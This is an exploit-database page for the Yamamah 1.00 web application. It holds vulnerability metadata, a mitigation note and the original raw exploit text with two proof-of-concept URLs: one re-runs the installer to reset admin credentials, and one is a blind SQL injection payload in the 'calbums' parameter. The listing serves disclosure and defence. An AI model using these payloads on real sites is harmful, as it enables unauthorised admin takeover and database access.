header-logo
Suggest Exploit
vendor:
Yamamah
by:
indoushka
7,5
CVSS
HIGH
Blind SQL/XPath injection
89
CWE
Product Name: Yamamah
Affected Version From: 1.00
Affected Version To: 1.00
Patch Exists: NO
Related CWE: N/A
CPE: a:yamamah:yamamah:1.00
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Lunix Français v.(9.4 Ubuntu)
2009

Yamamah Version 1.00 Mullti Vulnerability

An attacker can exploit a blind SQL/XPath injection vulnerability in Yamamah Version 1.00 by sending a crafted HTTP request to the vulnerable server. The attacker can use the 'calbums' parameter to inject malicious SQL/XPath statements into the application and gain access to sensitive information from the database.

Mitigation:

Input validation should be used to prevent malicious SQL/XPath injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Yamamah Version 1.00 Mullti Vulnerability           
| # Author   : indoushka                                                                                                              
| # Home     : www.dz-blackhat.com                                                                                                                                                                                                                   
| # Tested on: Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Mullti                                                             
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 (Reinstall Admin Information):
 
     1- http://127.0.0.1/yamamah_v1/install-/?step=3 
     
     (Blind SQL/XPath injection):
     
    2- http://127.0.0.1/yamamah_v1/?calbums=1+and+31337-31337=0+--+
                    
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.m-y.cc * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
--------------------------------------------------------------------------------------------------------------